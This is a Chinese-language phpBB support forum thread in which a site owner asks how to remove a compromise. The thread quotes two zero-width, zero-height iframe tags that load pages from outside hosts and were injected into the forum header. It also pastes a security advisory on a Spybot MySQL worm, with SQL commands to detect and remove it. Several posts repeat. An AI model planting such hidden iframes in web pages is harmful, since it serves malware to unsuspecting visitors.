[問題] 請教各位前輩,關於被放了木馬...
版主: 版主管理群
版面規則
本區是討論關於 phpBB 2.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
本區是討論關於 phpBB 2.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
[問題] 請教各位前輩,關於被放了木馬...
小弟昨天接到自己站上使用者來訊說被放了木馬,
於是乎檢查了一下還真的是有之前討論串裡面提到的惡意網址被iframe加在討論區原始碼上面,小弟phpBB方面算是完全的初學者,不知道應該怎麼清除這些東西,
請各位討論區前輩不吝賜教
●小弟的討論區是架設在這個空間中http://burning-g.net/plan_1.php,小弟選擇的是G1-C型
●小弟上網方式是學術網路
●討論區版本昨天聽說被放了木馬以後就立刻先升到2.0.15版
●小弟的討論區網址:http://www.afuro.holyou.net/phpbb/
昨天聽說這樣的狀況後就決定更新2.0.15版,然後因為自己的不熟練和耍蠢稿了很久...(汗),還浪費了某位前被大哥的時間幫忙解決,真是不好意思 ,不過在更新問題底定後,還是不知道應該怎麼清除這個討厭的網址....
經過IE檢視原始檔後,發現\r
在首頁上方 討論區標題的描述那邊 敝站的"野灰色小站討論區"字串後面\r
被加上了<iframe src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>
以及
<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>
大致上是這樣,想請各位前輩幫小弟看看並且指導小弟應該怎麼處理,因為是出學者所以完全不知道怎麼改..... 謝謝各位耐心的看完這篇求救文!
於是乎檢查了一下還真的是有之前討論串裡面提到的惡意網址被iframe加在討論區原始碼上面,小弟phpBB方面算是完全的初學者,不知道應該怎麼清除這些東西,
請各位討論區前輩不吝賜教
●小弟的討論區是架設在這個空間中http://burning-g.net/plan_1.php,小弟選擇的是G1-C型
●小弟上網方式是學術網路
●討論區版本昨天聽說被放了木馬以後就立刻先升到2.0.15版
●小弟的討論區網址:http://www.afuro.holyou.net/phpbb/
昨天聽說這樣的狀況後就決定更新2.0.15版,然後因為自己的不熟練和耍蠢稿了很久...(汗),還浪費了某位前被大哥的時間幫忙解決,真是不好意思 ,不過在更新問題底定後,還是不知道應該怎麼清除這個討厭的網址....
經過IE檢視原始檔後,發現\r
在首頁上方 討論區標題的描述那邊 敝站的"野灰色小站討論區"字串後面\r
被加上了<iframe src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>
以及
<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>
大致上是這樣,想請各位前輩幫小弟看看並且指導小弟應該怎麼處理,因為是出學者所以完全不知道怎麼改..... 謝謝各位耐心的看完這篇求救文!
-
- 星球公民
- 文章: 160
- 註冊時間: 2004-09-01 20:22
- 來自: 香港
我是香港來的白痴......蠢材是也
------------------------------------
懶!不想次次抄!先寫為敬!
●免費空間連結: http://www.hk82.net/
●您的 phpBB2 版本:phpBB 2.0.17
●您的 domain(網域名稱) :http://www.ace-forum.net
●MOD:Global announcement 2.0.6
Quick reply to topic 1.1.2
Multiple BBCode 1.2.1+Cash Mod 2.2.1
Advanced Hide Post 1.0.1
走馬燈
linkzshop
Attachment MOD 2314
------------------------------------
懶!不想次次抄!先寫為敬!
●免費空間連結: http://www.hk82.net/
●您的 phpBB2 版本:phpBB 2.0.17
●您的 domain(網域名稱) :http://www.ace-forum.net
●MOD:Global announcement 2.0.6
Quick reply to topic 1.1.2
Multiple BBCode 1.2.1+Cash Mod 2.2.1
Advanced Hide Post 1.0.1
走馬燈
linkzshop
Attachment MOD 2314
主機的php版本會不會是4.3.10之前的版本?
你沒有說明你的主機相關的環境以及版本,我不是很能肯定耶\r
win平台的話,這也是有可能\r
你沒有說明你的主機相關的環境以及版本,我不是很能肯定耶\r
win平台的話,這也是有可能\r
事件通告:攻擊MySQL蠕蟲,專挑懶人密碼下手
2005/02/02
風險等級: 警戒狀態
摘 要: 一隻專門攻擊Windows平台上的SQL Server的蠕蟲 Spybot.ivq 近日讓設定懶人密碼的管理者頭痛了,這隻蠕蟲的感染方式是利用猜測MySQL的系統管理者密碼,猜出以後會上傳一個含 Spybot 病毒的UDF (User Defined Function) 的檔案到SQL Server上,並利用MySQL的漏洞來讓該病毒自動在受駭主機上執行,如此一來整個系統就會淪為駭客魚肉。
HiNet SOC近日發現國內已有不少用戶受駭,提醒在Windows平台的 MySQL Server 管理員注意以下解決措施:
1. 設定存取控制,禁止遠端以系統管理者權限登入\r
2. 管理者密碼勿使用易遭破解或長度過短的密碼\r
3. 系統定期更新弱點修補
目前這隻蠕蟲只對Windows上的 MySQL 產生影響,如果您不確定是否受駭,請依下列方法檢查:
1. 在資料庫中下指令:SELECT * FROM mysql.func;
2. 檢查使否含有檔名為 "app_result" 的UDF檔案
3. 檢查是否有其他非法的UDF檔案
如果有發現受駭,移除方法如下:
1. 在資料庫中下指令:DROP FUNCTION app_result;
2. 安裝防毒軟體作全系統掃毒或利用 趨勢科技線上掃毒 來清除病毒
-.-
Re: [問題] 請教各位前輩,關於被放了木馬...
請問是不是我看錯了呢? 我到你的論壇看不到有AmuroSheu 寫:小弟昨天接到自己站上使用者來訊說被放了木馬,
於是乎檢查了一下還真的是有之前討論串裡面提到的惡意網址被iframe加在討論區原始碼上面,小弟phpBB方面算是完全的初學者,不知道應該怎麼清除這些東西,
請各位討論區前輩不吝賜教
●小弟的討論區是架設在這個空間中http://burning-g.net/plan_1.php,小弟選擇的是G1-C型
●小弟上網方式是學術網路
●討論區版本昨天聽說被放了木馬以後就立刻先升到2.0.15版
●小弟的討論區網址:http://www.afuro.holyou.net/phpbb/
昨天聽說這樣的狀況後就決定更新2.0.15版,然後因為自己的不熟練和耍蠢稿了很久...(汗),還浪費了某位前被大哥的時間幫忙解決,真是不好意思 ,不過在更新問題底定後,還是不知道應該怎麼清除這個討厭的網址....
經過IE檢視原始檔後,發現\r
在首頁上方 討論區標題的描述那邊 敝站的"野灰色小站討論區"字串後面\r
被加上了<iframe src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>
以及
<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>
大致上是這樣,想請各位前輩幫小弟看看並且指導小弟應該怎麼處理,因為是出學者所以完全不知道怎麼改..... 謝謝各位耐心的看完這篇求救文!
<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>之類的html出現